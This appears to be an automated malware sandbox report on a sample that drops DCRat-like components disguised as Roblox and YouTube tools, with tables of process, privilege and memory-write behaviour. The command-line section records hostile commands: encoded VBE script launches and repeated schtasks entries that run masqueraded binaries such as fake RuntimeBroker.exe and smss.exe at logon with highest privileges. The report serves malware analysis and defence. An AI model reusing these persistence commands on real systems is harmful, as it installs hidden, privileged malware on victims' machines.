N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 4476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 4476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 4476 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 4476 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 2408 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\system32\schtasks.exe
PID 2408 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\system32\schtasks.exe
PID 2408 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\system32\schtasks.exe
PID 2408 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2408 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2408 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2408 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2408 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2408 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2408 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2408 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 3604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 3604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 3604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 4912 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 4912 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 4912 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 4912 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Windows\system32\schtasks.exe
PID 4912 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Windows\system32\schtasks.exe
PID 4912 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Windows\system32\schtasks.exe
PID 3600 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 3600 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 3600 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 2272 wrote to memory of 2716 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2272 wrote to memory of 2716 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2272 wrote to memory of 2716 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 3112 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
PID 2716 wrote to memory of 3112 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
PID 2616 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 2616 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 2616 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 4492 wrote to memory of 2416 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 4492 wrote to memory of 2416 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 4492 wrote to memory of 4856 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4492 wrote to memory of 4856 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4492 wrote to memory of 4856 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3112 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\system32\schtasks.exe
PID 3112 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\system32\schtasks.exe
PID 3112 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 764 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 764 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe

"C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"

C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe

"C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"

C:\Users\Admin\AppData\Local\Temp\Result.exe

"C:\Users\Admin\AppData\Local\Temp\Result.exe"

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\solara.exe

"C:\Users\Admin\AppData\Local\Temp\solara.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\SysWOW64\msiexec.exe

"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 7F6EF5A27D212CCB16D49156F8B9A446

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 308240B41C6B2B581EDDC761FDFE78B6

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\msiexec.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Videos\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Admin\Videos\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Videos\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office\Office16\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office16\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office\Office16\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Templates\msiexec.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Users\All Users\Templates\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Templates\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Users\Public\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Public\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Users\Public\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\winNet\conhost.exe'" /f

